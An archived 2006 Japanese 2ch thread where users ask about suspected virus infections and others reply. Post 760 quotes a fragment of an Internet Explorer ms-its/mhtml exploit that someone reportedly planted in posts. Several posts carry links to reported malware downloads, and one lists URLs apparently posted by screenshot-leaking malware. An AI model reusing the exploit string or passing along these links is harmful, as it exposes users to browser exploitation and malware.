ttp://oreteki.org//media/img_20060614T114054057.JPG
ttp://oreteki.org//media/img_20060614T114054878.JPG
ヒント 夏

720 :名無しさん@お腹いっぱい。:2006/07/18(火) 02:13:30
質問です。解る方いたら教えてください。最近不意に電源が切れて再起動するんですが、ウィルスでしょうか…?PCは四月にかいかえたばかりで新しいし心当たりもとくにないんですよ…セキュリティーも、一応初心者ながらできる事はしてるつもりなんだけど。

721 :名無しさん@お腹いっぱい。:2006/07/18(火) 04:12:47
なんつーか、エスパーでもなければ答えられそうに無い質問ばっかだな

722 :名無しさん@お腹いっぱい。:2006/07/18(火) 05:10:53
http://up.nm78.com/data/up0000.jpg.kintama.exe
踏んでしまったのですが、大丈夫でしょうか?
確認のためお願いします。

723 :名無しさん@お腹いっぱい。:2006/07/18(火) 06:29:31
>>722
エロサイトに飛ばされるだけ。問題なし

724 :名無しさん@お腹いっぱい。:2006/07/18(火) 09:06:34
OSはWINDOWS2000 SP4を使っています
シマンテックでウイルスチェックをしたところTrojan.Wimad に感染していました
自分はavastのしかつかっていないのですがシマンテックのセキュリティを使わないと駆除できないのでしょうか?
普通に感染したファイルを削除するだけで大丈夫ですか?
急にPCから音が聞こえなくなったのでウイルスが原因かと思ってます

725 :名無しさん@お腹いっぱい。:2006/07/18(火) 09:39:28
右クリックができなくなったり、タスクマネージャが開けなくなるウィルスってありますか?
双葉でいろいろ画像みてて、気に入ったエロ画像があったので保存しようとしたら
表示できるし、何度も画像ひらけれるのにファイルがありませんとかほざきやがって
IEの上のほうにあるファイルから直接保存しようとしてもファイルがないとかいいやがる
しまいには右クリできないようになり、タスクマネージャも起動できなくなりました。
起動しようとしたら、「ディン!ディン!」ってむりな時になる音つきで!

再起動したら今の所問題はありません。
ただ再起動後IE起動させようと思ったらクソおもかったです。
ノートン2006とウィルスバスターオンラインスキャンやりましたがウィルスの反応はありませんでした。

726 :名無しさん@お腹いっぱい。:2006/07/18(火) 10:38:51
なんつーか、エスパーでもなければ答えられそうに無い質問ばっかだな

727 :名無しさん@お腹いっぱい。:2006/07/18(火) 11:08:25
まったくだ。

728 :名無しさん@お腹いっぱい。:2006/07/18(火) 11:51:48
ホントに夏っぽくなるんだなw

729 :名無しさん@お腹いっぱい。:2006/07/18(火) 15:22:12
エスパー伊藤を要請する

てか、テンプレ使わない奴はスルーで

730 :名無しさん@お腹いっぱい。:2006/07/18(火) 15:40:22
【使用OS】 WindowsXP
【WindowsUpdateしてるか】 自動更新のみ
【AntiVirusは何を使っているか】 ウイルスバスター
【スキャンした結果(ウイルス名・発見場所)】 PE_LOOKED.AK-O
【これまでにとった措置】 無し
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=PE_LOOKED.AK-O
ここをみたけど英語で全然わかりません よろしくお願いします

731 :730:2006/07/18(火) 16:54:17
すいません
さっきまで英語だったのですがなぜか日本語になりました
失礼しました

732 :名無しさん@お腹いっぱい。:2006/07/18(火) 19:59:47
【使用OS】 Windows XP
【WindowsUpdateしてるか】 自動更新のみ
【AntiVirusは何を使っているか】 McAfee Security Center, Spybot
【ちゃんとUpdateしてるか】 マカフィーは自動、Spybotは更新してからスキャンしました。
【スキャンした結果(ウイルス名・発見場所)】 McAfeeでは何も発見されず、Spybotではいくつか見つかったがcookieでした。
【症状を具体的に、分かる限りすべて書く】 タスクバーに空白の最小化ウインドウが勝手に現れ一秒くらいすると勝手に消えます。
これが5分くらいの間隔で繰り返されます。最小化ウインドウのアイコンはアプリケーションのものでウインドウを抽象化したようなやつです。
【これまでにとった措置】 McAfeeで何も見つからなかったのでスパイウェアかと思い、Spybotを導入してスキャンしたところ多数の異常(怪しいcookieとレジストリの改変)が検出されました。
それらの問題はSpybotが削除してくれましたが、しかしその後も上記の症状が治まらず、お手上げ。

733 :名無しさん@お腹いっぱい。:2006/07/18(火) 20:28:47
>>732
そうなったきっかけに心当たりは?
発症した日時がわかるならそれ以前の状態にシステムの復元
そうでなければどうしようかねぇ…
パーソナルファイアウォールは何か使ってる?

後どーでもいいがMcAfee Security CenterはMcAfee製品のおまけソフトで
アンチウイルスソフトの名称はMcAfee VirusScanな

734 :名無しさん@お腹いっぱい。:2006/07/18(火) 22:04:50
>>733
いつのまにか出現するようになったのでわからないですね。
こんな症状のウイルスって聞いたことないですか?
パーソナルファイアーウォールはMcAfeeのPersonal Firewall Plusです。
Mcafee Security CenterにPrivacy Service以外入ってるんだが・・何が問題なんだろ

735 :名無しさん@お腹いっぱい。:2006/07/18(火) 22:46:56
>>731
日本語でおk?

736 :名無しさん@お腹いっぱい。:2006/07/18(火) 22:50:22
>>734
パーソナルファイアウォールが警告とか出してない?
あるいはファイアウォールの許可ルールに変なモノが入ってたりとか


とりあえず現状での選択肢は…とっさに思いつくのはこんなもんか

1.とりあえず大丈夫だった気がする時点までシステムの復元で戻す
2.地道に原因捜す(>>533あたり)
3.ほかのツールに頼る(他社のオンラインスキャンとか)
4.OSから入れなおす
5.無視してこのまま使う

737 :名無しさん@お腹いっぱい。:2006/07/18(火) 23:23:51
>>736
ファイアウォールの設定を初期化したら出なくなった模様。
ってことは既に個人情報流出済みか?(゚д゚)
とりあえず736に禿げしくトン。

738 :名無しさん@お腹いっぱい。:2006/07/19(水) 00:07:51
ドス窓formatそうさでウィルスが誘発したと
警察に届けると騒ぐアホ

http://game10.2ch.net/test/read.cgi/game/1151587362/

739 :名無しさん@お腹いっぱい。:2006/07/19(水) 06:26:04
AVGフリーでスキャンしてVirus identified Worm/Generic.QB
というのがひっかかったんですけど、これってどういうことするウイルスでどれぐらい危険なんですか?
ぐぐっても出てこないので教えてくださいm(_ _)m

740 :名無しさん@お腹いっぱい。:2006/07/19(水) 08:01:44
>>739
君のPCに風穴開けてネットの向こうから操作できるようにする
操られた君のPCは仲間を増やそうと同じウイルスをばらまく

741 :739:2006/07/19(水) 16:25:09
>>740
ありがとうございます
一応感染してたやつを削除してスキャンし直してひっからなければ大丈夫ですよね?

742 :名無しさん@お腹いっぱい。:2006/07/19(水) 18:27:09
tp://www.nikkamsports.com/ns/entertainment/f-et-tp0-060209-0010.html
踏んでしまいました。ウィルスと他の人は言うのですが、ノートンが反応しませんでした。
スキャンしましたが、脅威は見つかりませんと出ます。大丈夫でしょうか。

743 :名無しさん@お腹いっぱい。:2006/07/19(水) 18:46:06
>>742
踏んだだけなら無害。
そこから落としたexeを実行すると有害。

744 :名無しさん@お腹いっぱい。:2006/07/19(水) 18:52:42
>>742です
>>743さんどうもありがとうございます。これで安心して眠れます。

745 :名無しさん@お腹いっぱい。:2006/07/19(水) 22:02:11
Firewall&Forestさんとこでも聞いてるな・・・

746 :名無しさん@お腹いっぱい。:2006/07/19(水) 23:50:27
>>745さん
>>742ですが、私はここにしか書いていません。
私が見たスレでは何人か踏んでしまった人がいたようですので
他の方かもしれません。

747 :名無しさん@お腹いっぱい。:2006/07/20(木) 03:09:12
>>80
超亀なんだが、引っかかったので。
たぶんそのファイルは「いけない保健室」だかなんだかの
インストーラを装ってなかったか?w

真剣に解析してないけど、ベクターにあるGとハエが飛び回るジョークソフトに
ちょっと手を加えた程度のものだと思う。ただ、うちではシステムの復元は
無効にはなってなかった。別ハッシュのファイルかも。

ちなみに、ノートン@20060712でもウイルスともジョークソフトとも検出されなかった。
たぶん超マイナーなウイルス?なんだろうと思う。

仮想マシンの中でずっとモニタしてみたが、何らかの破壊活動をしたり、
増殖したり、外部に情報送ったりってことはやってないみたい。たぶん。
めんどいんでリカバリしたけどさ。

どうでもいいが、おまいさん去年も同じ質問してなかったか?w

748 :名無しさん@お腹いっぱい。:2006/07/20(木) 10:25:33
質問よろしいでしょうか?
外付けHDD(LAN)の中に「xi.exe」というファイルが知らない間に出てきます。
ノートンがウィルス警告出すのでウィルスだと思うのですが削除したはずなのに
また出てきます。PC本体をspybotで検索しても問題なしとなるのですが
本当に大丈夫なのでしょうか?また削除しても出てくる「xi.exe」とは
なんなのでしょうか?どなたかご存知の方、いらっしゃいましたら
御教授宜しくお願いします。

749 :名無しさん@お腹いっぱい。:2006/07/20(木) 11:20:30
>>748
http://www.viruschaser.jp/vi_index/vi_w/Win32.HLLW.Rirc.2.html

750 :名無しさん@お腹いっぱい。:2006/07/20(木) 15:13:04
>>748
あなたもBotnetの仲間入りです。
下手すると、濡れ衣を着せられますよ。

751 :名無しさん@お腹いっぱい。:2006/07/20(木) 15:21:29
>>748
賠償請求もあり得るよ

752 :名無しさん@お腹いっぱい。:2006/07/20(木) 19:42:03
>> 749-751
御回答ありがとうございました。


753 :名無しさん@お腹いっぱい。:2006/07/20(木) 19:43:22
ウィルスに感染し、ウィルスバスターで感染を調べて見たら200程見つかりました
その後そのパソコンを一年ほど使わず放置していたらネットどころか、ワードすら開けなくなっていました
こういう場合はどのようにすれば直せるのでしょうか?電器屋に出す以外何がありますか?

754 :名無しさん@お腹いっぱい。:2006/07/20(木) 19:47:40
>>753
ワードが開かない原因がウィルスかどうかは分からないけど、OSのクリーンインストールが一番。
もしOSが98かMeなら買い替えも考えた方がいいかも。

755 :名無しさん@お腹いっぱい。:2006/07/20(木) 19:47:59
OS再インストール

756 :名無しさん@お腹いっぱい。:2006/07/20(木) 21:56:11
しかねえだろよ。

757 :名無しさん@お腹いっぱい。:2006/07/20(木) 22:49:28
http://munimoni.angelcities.com/
すみません、これ踏んでしまったのですが、大丈夫でしょうか?
一応SPYBOTとノートンのスキャンかけましたが
何も出て来ませんでした。
ご教授のほう宜しくお願いします。

758 :名無しさん@お腹いっぱい。:2006/07/20(木) 23:01:18
マカフィーで「JS/Wonka」にかかったと表示されました。
ttp://www.mcafee.com/japan/security/virW2005.asp?v=JS/Wonka
ここを見る限り、駆除方法がかかれてないんですが、どうして駆除すればよいでしょうか?

ファイルの隔離や削除もできません。
ご教授願います。

759 :名無しさん@お腹いっぱい。:2006/07/20(木) 23:06:43
>>758
JS/Wonka の検索結果のうち 日本語のページ 約 460 件中 1 - 10 件目 (0.85 秒)

760 :名無しさん@お腹いっぱい。:2006/07/20(木) 23:08:27
既出かもしれませんが、実況板でこれを目欄に入れてるアホがいたので報告  <object data="ms-its:mhtml:file://C:\\MAIN.MHT!

これが入ってるスレを開くとノートンが反応、Bloodhound.Exploit.6のウィルス名が出ます
今までと別種のコードでしょうね、対応策はあるでしょうか?
もちろんググっても出てきませんでした。


761 :名無しさん@お腹いっぱい。:2006/07/20(木) 23:23:52
お前ら全員テンプレに目を通して出直してきやがれ

762 :名無しさん@お腹いっぱい。:2006/07/20(木) 23:43:24
>>761
すみませんでした。
他に逝ってきます。

763 :名無しさん@お腹いっぱい。:2006/07/21(金) 03:32:24
tp://www.keygen.us/get.shtml?20472
を踏んでしまいました鑑定してもらったら

そのページを開くとAvastさんがWin32:Trojano-826を発見しました。
しかも、243461.exeという実行ファイルをダウソするか聞いてきます。
このファイルにもWin32:Small-WU [Trj]を発見してます。触らぬが吉です。

言われたのですが、どうすれば良いですか?
ノートンでスキャンしましたが、反応なしでした

764 :名無しさん@お腹いっぱい。:2006/07/21(金) 04:44:54
>>763
>>1

765 :名無しさん@お腹いっぱい。:2006/07/21(金) 05:34:40
変なのばっかだなw
テンプレ使わないわウイルスコード貼り付けるわ

766 :名無しさん@お腹いっぱい。:2006/07/21(金) 13:43:20
あげ

767 :名無しさん@お腹いっぱい。:2006/07/21(金) 15:07:18
>>763
(´・ω・)カワイソス

768 :名無しさん@お腹いっぱい。:2006/07/22(土) 15:35:52
特にPCに異常があるわけではないのですが
新しい製品にしようと思いその助言を頂たいので宜しくお願いします。
【使用OS】Windows XP
【WindowsUpdateしてるか】YES
【AntiVirusは何を使っているか】ノートンアンチウイルス2004
【ちゃんとUpdateしてるか】 更新サービス期限切れ(そのまま約2年間使用)
【スキャンした結果(ウイルス名・発見場所)】現状ではなにもありません
【別のオンラインスキャンしたならその結果は】 してません
【症状を具体的に、分かる限りすべて書く】 特にないです
【何をしたらそんなことになったのか】 なし
【これまでにとった措置】 なし
【その他の質問】
ノートンアンチウイルス2006に変えようと思っているのですが
アップグレード版とダウンロード版では料金以外になにが違うのでしょうか?
また、ノートンアンチウイルス以外にお勧めはありますか?
当方、自分の個人情報以外は特にPC内に保存されていません。
宜しくお願い致します。

769 :名無しさん@お腹いっぱい。:2006/07/22(土) 16:20:06
>>768
むこうでアホに煽られていたね。

>ノートンアンチウイルス2006に変えようと思っているのですが
>アップグレード版とダウンロード版では料金以外になにが違うのでしょうか?

このへんを読むと全く解らないようだから、
お店に行ってノートンでもバスターでも好きな方の通常版を買ったほうがいいと思うよ。

770 :名無しさん@お腹いっぱい。:2006/07/22(土) 16:20:38
スレ違いだろ。ノートンスレにでもいけよ

771 :名無しさん@お腹いっぱい。:2006/07/23(日) 01:51:13
【使用OS】 Windows XP
【WindowsUpdateしてるか】 自動更新のみ
PCを起動してもアイコンやタスクバー、左、右クリックをしても
何も表示されなく、セーフモードやCtrl+Alt+Deleteなどをいろいろ試したら
アイコンやタスクバーが表示できました(また起動した時に消えるけど)
ノートンの反応も無かったけど、ウィルスに感染しているかもしれないので、
どなたか駆除方法を教えて下さい。よろしくお願いします

772 :名無しさん@お腹いっぱい。:2006/07/23(日) 03:51:31
面 倒 く さ が ら ず に テ ン プ レ 埋 め ろ

773 :名無しさん@お腹いっぱい。:2006/07/23(日) 08:04:28
rootkitってどうやって除去すればいいんだ?
wionwsフォルダの中身が見えない

774 :名無しさん@お腹いっぱい。:2006/07/23(日) 08:54:07
>>773
OSが改変されているので感染したPCからでは基本的には無理
ネットワーク経由などで別PCからrootkit本体を削除できれば
直る可能性もあるかもしれないが、そこまでいったら大抵は
クリーンインストールなりリカバリなりでHDDの内容を書き換えて
しまったほうが早い

775 :名無しさん@お腹いっぱい。:2006/07/23(日) 12:49:03
>>773
Fなんとか っつーので出来たとおもた

776 :名無しさん@お腹いっぱい。:2006/07/25(火) 03:23:26
RootkitRevealer(単独名だけど実質Rootkit関連スレ
ttp://pc8.2ch.net/test/read.cgi/sec/1110397075/l50

777 :名無しさん@お腹いっぱい。:2006/07/25(火) 05:02:37
共有ミュージックと言うフォルダの中に
@C\WINDOWS\inf\unregmp2.exe,-161
@C\WINDOWS\inf\unregmp2.exe,-162
と言う謎のフォルダがあるのですが何なのでしょうか?


778 :名無しさん@お腹いっぱい。:2006/07/25(火) 23:19:04
unregmp2.exe の検索結果のうち 日本語のページ 約 1,310 件中 11 - 20 件目 (0.95 秒)

779 :名無しさん@お腹いっぱい。:2006/07/25(火) 23:22:18
unregmp2.exe の検索結果のうち 日本語のページ 約 1,310 件中 21 - 30 件目 (0.36 秒)

780 :名無しさん@お腹いっぱい。:2006/07/25(火) 23:56:54
姉のパソコンが不調(ウィルス?)らしいので、どなたかお願いします

【使用OS】
XP
【AntiVirusは何を使っているか】
ウィルスセキュリティ
【症状を具体的に、分かる限りすべて書く】
ようこそ画面から進もうとすると再起動してしまう。
セーフモードは起動可能らしい
【何をしたらそんなことになったのか】
daemon toolを落としてみた
【これまでにとった措置】
まだなし
【その他の質問】
ウィルスだとすればセーフモードで何をすればいいのか教えてください

781 :名無しさん@お腹いっぱい。:2006/07/26(水) 00:02:58
>>780
素直に自分のPCって認めたらいいじゃんw

782 :名無しさん@お腹いっぱい。:2006/07/26(水) 00:08:55
ほんっと多いよなw
友達が・・・弟が・・・母親が・・・ってやつw
誰のだろうがどうでもいいってのに

783 :780:2006/07/26(水) 00:22:47
>>781-782
自分のPCがそんな状態だったらここに書きこめないとは思わないですか

一応セーフモードのやり方は教えたけど…そっからのアドバイス希望です

784 :名無しさん@お腹いっぱい。:2006/07/26(水) 00:57:14
daemon toolを落としてみたてのが分からん
ダウンロードしてインストしたってか?
それとも終了させたのか
何故それがウィルスの所為に

785 :名無しさん@お腹いっぱい。:2006/07/26(水) 01:06:55
とりあえずDaemon Toolsアンインストール

786 :780:2006/07/26(水) 01:20:17
>>784-785
ごめん、詳細に聞いてみた。
Daemon起動のときに再起動を要求されて、
再起動してみたら「ようこそ画面」から動かなくなったとのこと。

セーフモードでは最初にDLしたときにexeファイルだけがデスクトップに残って、
Programファイルの中にもどこにもDaemonのインスト跡が無かった。

対処として、
さっきシステム復元というのがあって、それをしてみたそうですが。
セーフモード私は起動したことないので、どうなるのかはわかんないです。

787 :名無しさん@お腹いっぱい。:2006/07/26(水) 01:46:44
アンインストもできず復元で直らないならもうOS再インストしかないような
当然バックアップなどなさそうだし
ってかそれで何故ウィルスかと聞いている
セーフモードでスキャンしたのか
他にシステムに異常が起こりそうな行動はしなかったのか
どっちにしても板違いだな
多分

788 :780:2006/07/26(水) 01:53:38
>何故ウィルス
再起動を繰り返すウィルスが存在するのは知っているから、もしかしたら…と思った。
「異常が起きたら何でもウィルス」ではないのは承知なのだけれど…。

>セーフモードスキャン
やってみたそうです。ウィルス出てこなかったって。
うがぁー指示だけ出すの疲れてきた



789 :名無しさん@お腹いっぱい。:2006/07/26(水) 03:53:39
【使用OS】WindowsXP SP2
【WindowsUpdateしてるか】している。
【AntiVirusは何を使っているか】トレンドマイクロ ウィルスバスター2005
【ちゃんとUpdateしてるか】しています。
【スキャンした結果(ウイルス名・発見場所)】
ウィルス検査→ウィルス無し
スパイウェア検査→ADW_CYDOOR.Aの1件だけ。無害との事なので、放置しています。
【別のオンラインスキャンしたならその結果は】していません。
【症状を具体的に、分かる限りすべて書く】 リンクをクリックしたとき、2回の1回の割合で関係の無いページに飛ばされてしまいます。
【何をしたらそんなことになったのか】特別な事をした記憶はありません。アンチウィルスソフトも常駐させていました。
【これまでにとった措置】関係の無いファイル(使っていないファイル)は全て削除。クッキー、インターネット一時ファイルも削除。
【その他の質問】HDDには存在せず、メモリ上にのみ存在するウィルス・・・ということもあり得るのでしょうか?

790 :名無しさん@お腹いっぱい。:2006/07/26(水) 04:24:56
>>789
ttp://www.shareedge.com/spywareguide/product_show.php?id=7

この症状に心当たり無いか
特にシステムフォルダ内に該当のファイルが存在しているかどうか

791 :名無しさん@お腹いっぱい。:2006/07/26(水) 04:25:59
それ、スパイウェアー。

で、どんなエロを見たんだい?

792 :名無しさん@お腹いっぱい。:2006/07/26(水) 05:11:13
インストールしたアプリにバンドルされたんじゃない?
使ってないけど「FlashGet」とかには入ってたはず

793 :名無しさん@お腹いっぱい。:2006/07/26(水) 05:25:07
>>790->>792
FlashGetは前々から使っていたのですが、
ソフト起動時以外に広告が出たり、違うページに飛ばされるといった事はありませんでした。


794 :名無しさん@お腹いっぱい。:2006/07/26(水) 05:27:36
ちなみに

1.以下のファイルを削除します(通常 C:\WINDOWS\SYSTEM\ にあります):
CD_CLINT.DLL
CD_GIF.DLL
CD_HTM.DLL
CD_SWF.DLL
CD_LOAD.EXE

2.ADCACHE フォルダとその中のフィアルを削除します (通常C:\WINDOWS\SYSTEM\ に見つかります)。


との事ですが、どれも見つかりませんでした。

795 :名無しさん@お腹いっぱい。:2006/07/26(水) 05:33:32
>CD_CLINT.DLL

今見たらあったw

796 :名無しさん@お腹いっぱい。:2006/07/26(水) 22:24:12
.exeが原因で〜と起動時に毎回でてくるんですが
ググッたらhttp://www.mcafee.com/japan/security/virA2003.asp?v=W32/Alphx.worm.c
で手動による駆除方法をやってみたんですががなにも変わらなかったです
ウイルスだったら駆除の仕方を教えてください

OSはXPです


797 :名無しさん@お腹いっぱい。:2006/07/26(水) 22:36:55
>>796
リカバリ

798 :名無しさん@お腹いっぱい。:2006/07/26(水) 23:06:30
.exeや.zipのファイルにウイルスバスター検索かけたら、検知の反応は出ませんでした。
そういうファイルはインストールしても問題ないでしょうか?

.exeはウイルスバスターでファイルの内部まで検索してくれているのでしょうか?
誤って感染してしまうと大変なので、よろしくお願いします。

799 :名無しさん@お腹いっぱい。:2006/07/27(木) 00:49:57
今、オンラインスキャンしたら
TROJ_VB.WPとでたんだがこのウイルスは実在するの?

800 :名無しさん@お腹いっぱい。:2006/07/27(木) 01:37:40
>>798
インストーラの中も検査はしてくれてるけどウイルスバスターが全てのウイルスに対応してるわけじゃない
だからそのレスだけでインストールしていいか悪いかなんて答えれるわけない
そもそもダウンロード先が信用できないexeなんて関わらない方がいいに決まってる
エロゲでもダウンロードしたのか?w

801 :名無しさん@お腹いっぱい。:2006/07/27(木) 11:16:34
これ、何がなんだかわからずどうしたらいいかも迷っております。
よろしくお願いいたします。

◆【使用OS】
Windows XP Pro SP2
◆【WindowsUpdateしてるか】
日経BP等ニュースサイトを毎日チェックするのでそれを見て+なんとなく週一回くらいは
◆【AntiVirusは何を使っているか】
Norton Anti Virus 2006(障害が起こった後Avast4Homeで検索を試してみたり)
◆【ちゃんとUpdateしてるか】
最新のバージョンになってます。
◆【スキャンした結果(ウイルス名・発見場所)】
全てのドライブ(HDDは1ドライブのみ搭載しているマシンですが)見つからず…
◆【別のオンラインスキャンしたならその結果は】
こちらも同じく見つからず…
◆【症状を具体的に、分かる限りすべて書く】
c:\の直下に\共有\というフォルダというフォルダを作ってLAN内で共有を行っております。
そこの一番上に見知らぬsetup.exeという60KBに満たぬサイズのファイルが作成されてしまっており、消しても再起動したりするとまた生成されます。

802 :801続き:2006/07/27(木) 11:17:21
これとはリンクしない事柄かもしれませんがひたすらスパムが届くようになりました。
サブジェクトはrumubVjlAGRA や hoaom VljAGGRA などバイアグラ?と読めるような文字列が必ず含まれておりまして内容としては
///////////////////////////////
VljAGGRA from 3 , 33 $

http://www.cuhertadecasaxe.com


,

,

,

,

neck. The wrist clamps snapped open. I sighed and dropped my arms. I
didnt have to look to know that Floyd had been imprisoned the same
way.
///////////////////////////////
などの広告っぽいスパムです。

803 :801続き:2006/07/27(木) 11:19:24
メール(Bekye!2使用)でやり取りしていた相手までスパムが届くようになってしまいました。

【何をしたらそんなことになったのか】
正直、エロサイト(最近はポルノグラフだけかな)を見たり、ゲーム(店売りCD Only)を多数入れたり、窓の杜から落としてきたフリーのアプリケーションを試したりと色々やってるので身に覚えがありすぎてなんとも…

【これまでにとった措置】
Nortonで全ドライブ検査、Avast!4Homeでブートタイムシーク 全ドライブ、SpyBOTでブートタイムシーク(DoubleClickや無題なもの三つほど)、Ad aware全ドライブ検査で何も出てこず
トレンドマイクロオンラインスキャン試行、何も出てこず
直接怪しいファイルの削除→再起動後、復活

【その他の質問】


804 :名無しさん@お腹いっぱい。:2006/07/27(木) 11:21:31
>>801
ウイルス名かけ

805 :801:2006/07/27(木) 11:30:55
>>804
◆【スキャンした結果(ウイルス名・発見場所)】
全てのドライブ(HDDは1ドライブのみ搭載しているマシンですが)見つからず…

ウィルス名からわからなくて困っております。
なお、メール文章をググってみたりなどもしておりますが何も出てきませんでした。
ウィルス名がわかり有効な対処法がわかれば実行したいと思っております。

806 :名無しさん@お腹いっぱい。:2006/07/27(木) 13:25:07
>>805
試しにそのsetup.exeここ送ってみ
ttp://www.virustotal.com/en/indexf.html

807 :名無しさん@お腹いっぱい。:2006/07/27(木) 15:34:14
旧パソでウィニーウイルスに感染。
新しいのを買ったのですが、旧パソをクリーンインストールしてないと
デスクトップの画像をupされますか?

808 :名無しさん@お腹いっぱい。:2006/07/27(木) 15:51:34
これで駆除しろよ
http://www.microsoft.com/downloads/details.aspx?FamilyID=ad724ae0-e72d-4f54-9ab3-75b8eb148356&DisplayLang=ja

809 :名無しさん@お腹いっぱい。:2006/07/27(木) 16:23:40
>>808
ありがとう。やってみます。

810 :名無しさん@お腹いっぱい。:2006/07/27(木) 17:01:48
リモートアシスタンスってのが出てきて、調べてみるとC:\WINDOWS\system32\rcimlby.exe -LaunchRAにありました。
んで、削除してみると、rcp.exeが出てきます。消しても消しても交互に出てくるのウイルスですか?

811 :名無しさん@お腹いっぱい。:2006/07/27(木) 17:23:34
自己解決

812 :801:2006/07/27(木) 17:54:40
>>806
レスポンスありがとうございます。
便利なサイトがあるんですねぇ。
しかし 全部見事に何も検出しなかったようです。

とりあえず最終手段の準備に取り掛かりますが、今後の対策をどうしようかなーという具合です。


813 :名無しさん@お腹いっぱい。:2006/07/29(土) 08:53:39
ノートン以外の駆除ソフトを使っており、
専用ブラウザの2chのログ
tp://news19.2ch.net/test/read.cgi/newsplus/1153547033
からウィルス反応がありました。
これは、>>7 の Q1 と同件と考えて良いのでしょうか。

駆除等の対策が終った今、
恐らくはノートントラップとやらに反応しただけで、
PC無害ではないかと予想しているのですが、
開き直して確認する勇気もありません。

814 :名無しさん@お腹いっぱい。:2006/07/29(土) 11:57:20
【使用OS】WindowsXP SP2
【WindowsUpdateしてるか】しています
【AntiVirusは何を使っているか】Avira AntiVir PersonalEdition Classic
【ちゃんとUpdateしてるか】しています
【スキャンした結果(ウイルス名・発見場所)】
ウイルス名・PHISH/EbayFraud.CS
発見場所・C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\c98w3zmu.default\google_safebrowsing.db-journal
【症状を具体的に、分かる限りすべて書く】今のところ特にないです。
【何をしたらそんなことになったのか】何もしていないときにいきなり反応しました。
【これまでにとった措置】
antivirで削除してみたんですがwindows再起動後にfirefoxを起動させてみたらまた反応してしまいました。

815 :名無しさん@お腹いっぱい。:2006/07/30(日) 00:02:55
>>814
PHISH/EbayFraud.CSと検知するプログラムがメモリ上に展開されるところ
で発見されたと思われます。
antivirで削除したあとに、
firefoxのキャッシュ全部消して、firefox一旦アンイストールして、
最新版のfirefoxをインストールしてみるのはどうですか?
それから最新の状態のantivirで全ファイル検索。
もう一度再起動して警告がでないか見ます。
大体それでOKだとおもいます。



816 :名無しさん@お腹いっぱい。:2006/07/30(日) 00:07:21
使用OS】 WinXP
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】ウイルスバスター2004
【ちゃんとUpdateしてるか】 はい

アンチウイルスソフトで検索して何も発見されない場合、
ウイルスにかかっていないと判断して大丈夫なんでしょうか?


817 :名無しさん@お腹いっぱい。:2006/07/30(日) 00:25:47

【使用OS】 Windows XP
【WindowsUpdateしてるか】はい
【AntiVirusは何を使っているか】 マカフィー・ウィルススキャン
【ちゃんとUpdateしてるか】 はい
【スキャンした結果(ウイルス名・発見場所)】 VBS/LoveLetter@MM
【症状を具体的に、分かる限りすべて書く】 今のところ、特にありません。
【何をしたらそんなことになったのか】 ネット(ここ2ちゃんねる)
【その他の質問】 ウィルスが発見されました、と表示が出たのですが、
削除も駆除も隔離もしようとしても、不可能となってしまいます…。

最近PCを始めた初心者なもので、
わかりにくかったら、すいません。


818 :これはメルボムなんですか?:2006/07/30(日) 10:44:35
こんなのがサブアドに来ました。入り切らないですけど、よろしくお願いします。以下はメルボムですかね?
Hi. This is the qmail-send program at abtjMail.autobytel-japan.com.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

<ad@autobytel-japan.com>:
Sorry, no mailbox here by that name. (#5.1.1)

--- Below this line is a copy of the message.

Return-Path: <>
Received: (qmail 10994 invoked by uid 501); 30 Jul 2006 11:20:58 +0900
Received: from unknown (HELO hq-mail.autobytel-japan.com) (10.8.12.40)
by 0 with SMTP; 30 Jul 2006 11:20:58 +0900
Received: (qmail 29189 invoked by uid 0); 30 Jul 2006 10:35:38 +0900
Received: from unknown (HELO autobytel-japan.com) (...)
by hq-mail.autobytel-japan.com with SMTP; 30 Jul 2006 10:35:35 +0900
From:@.jp
To: ad@autobytel-japan.com
Subject: Delivery Failed

819 :名無しさん@お腹いっぱい。:2006/07/30(日) 10:59:02
>>816
そのパソコン使い始めてから欠かさずWindowsUpdateと
アンチウイルスソフトのアップデートやってて
特に危ない橋を渡った覚えもなきゃ気にしなくていいと思う
とはいえここに訊きに来るってことは何か気になるようなことでもあったのか?

あと、お節介だがいまどきウイルスバスター2004は古い
ただで2006にできるんだからやっておいたほうがいい

820 :名無しさん@お腹いっぱい。:2006/07/30(日) 11:03:50
>>817
2chのスレッドで検出されたなら誤検出
本物はメールを通じて感染する代物だし

削除なり隔離なりができないのは、
その時点ではブラウザが当該ファイルをつかんで離さないから
ブラウザのキャッシュクリアして後は忘れておしまい

821 :817:2006/07/30(日) 12:47:45
>>820
ご回答ありがとうございました。
一安心ですm(_ _)m

822 :814:2006/07/30(日) 13:55:46
>>815
ありがとうございます。
警告がでなくなりました。

823 :名無しさん@お腹いっぱい。:2006/07/30(日) 20:06:25
365 名前:[IP][] 投稿日:2006/07/30(日) 19:05:15 ID:sHiJpINK
【コンピュータ名】
【ユーザ名】
【回数】124 回目
【今こんな事やってます】[画像URL]

824 :名無しさん@お腹いっぱい。:2006/07/30(日) 20:37:46
http://sakura03.bbspink.com/test/read.cgi/ascii2d/1154202020/76
http://sakura03.bbspink.com/test/read.cgi/ascii2d/1137512291/224

http://sakura03.bbspink.com/test/read.cgi/ascii2d/1147286865/168
http://sakura03.bbspink.com/test/read.cgi/ascii2d/1152939395/153
http://sakura03.bbspink.com/test/read.cgi/ascii2d/1147286865/169
http://sakura03.bbspink.com/test/read.cgi/ascii2d/1146054382/374

http://sakura03.bbspink.com/test/read.cgi/ascii2d/1146054382/375
http://sakura03.bbspink.com/test/read.cgi/ascii2d/1154161200/19
http://sakura03.bbspink.com/test/read.cgi/ascii2d/1147286865/170
http://sakura03.bbspink.com/test/read.cgi/ascii2d/1131203131/154
http://sakura03.bbspink.com/test/read.cgi/ascii2d/1154013278/24

これか

825 :名無しさん@お腹いっぱい。:2006/07/30(日) 20:42:31
ん?新手か?

826 :名無しさん@お腹いっぱい。:2006/07/30(日) 20:57:17
なんか上のが異様に張られているぞ。
新手のウィルス????
何か情報はない?

827 :名無しさん@お腹いっぱい。:2006/07/30(日) 20:58:00
【新ウイルス?】 半角二次元にデスクトップ画像と思われるURLを含んだ機械的な書き込み
http://news20.2ch.net/test/read.cgi/news/1154257005/

こんなんがあった

828 :名無しさん@お腹いっぱい。:2006/07/30(日) 21:26:54
無料WinRARのスレで踏んだら花火が上がりますた。
